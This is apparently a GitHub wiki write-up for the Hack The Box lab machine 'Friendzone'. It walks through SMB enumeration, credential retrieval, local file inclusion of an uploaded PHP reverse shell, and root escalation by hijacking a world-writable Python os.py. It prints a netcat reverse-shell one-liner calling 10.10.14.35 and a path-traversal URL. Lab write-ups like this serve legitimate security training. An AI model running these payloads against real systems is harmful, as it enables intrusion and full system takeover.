HTB Friendzone - lmiyasato/lenny-hacking GitHub Wiki

1. Do a full nmap scan, you will find the following ports open.

2. Do a enum4linux against the target, the smbshares look interesting; shows that the general and development shares are read/writable.

3. Take a look at the general share by using the smbclient command; get a copy of the creds.txt file (Note: the creds.txt will be used later). Also note the development share is also writable, this will be used later.

4. Going to the friendzone website will show a basic webpage, however interrogating the webpage with tools like dirbuster or gleaning on the page source was not effective.

5. With DNS showing open, it seems to be worth interrogating. Initially dig does not give out anything useful.

6. If you take a look at the friendzone page, the email info will give a clue ([email protected]). Let’s try that domain. I don’t remember how I got the friendzone.red domain but I think it was from all that headbanging I did trying to get an initial shell on this box.

7. It you try using the IP address vs the domain name, you will get different results. Also you will get different results if you use http vs https. To successfully use the domain name within the web browser, you will need to modify your hosts file:

8. Navigate to the https://administrator1.friendzoneportal.red page, you will get the login screen. Login with the creds that was downloaded from the “general” smb share.

9. After logging in, you will get this page, this should give you a clue.

10. Now nagivate to the /dashboard.php page:

11. Take a closer look at the last line, replace dashboard.php with that line. If you look closer, the pagename=timestamp is actually a .php function that displays the line “final access timestamp is…” To show this, I will take out the image:

12. Shown below is the concept that the “timestamp” parameter is actually a php page. From looking at the previous URL, it shows potential to execute a LFI exploit.

13. In the samba “development” share, it shows it is read/writable. Upload a reverse .php shell. A sample reverse shell can be easily found on pentestmonkey.net.

14. With the shell uploaded, I set the callback port to “1234”, so start a netcat listener to listen on port 1234.

15. Paste the following URL in: https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../etc/Development/shell

Note that the context of launching the shell script revolves around knowing the path. The share name is based on the read/writeable development share, the “shell” without the .php is due to the backend .php code to include the .php extention being passed through.

To find the actual path, the smb enumeration script within nmap was used to find the mounted path from the local target system.

16. Provided the listener is setup prior to executing the url, you should get shell. From there obtaining the user flag is trivial.

17. Start a simple python web server to transfer a tool called pspy64s to the target system.

18. Now do a chmod on the pspy64s file and run it for about a minute or two. About a minute or two later, these processes which is ran by root (UID=0) will show a python script reporter.py is being executed every minute or two.

19. The reporter.py file is only editable by root but readable by everyone. It does import the “os” module within python.

20. Looking at the file permissions of os.py, it shows it is world writable, therefore allowing us to exploit the reporter.py script by modifying the os.py library import file.

21. Inject (append) the following code at the end of the os.py file (I forgot where I got the code from) and be sure to tweak the lhost/lport file --- Appending the two lines is easier.

    import os os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.35 6666>/tmp/f')

22. Copy the code to the target machine, then replace the os.py with the exploitable os.py.

23. Now start another netcat listener listening on port 4444 (based on screenshot) and wait for root!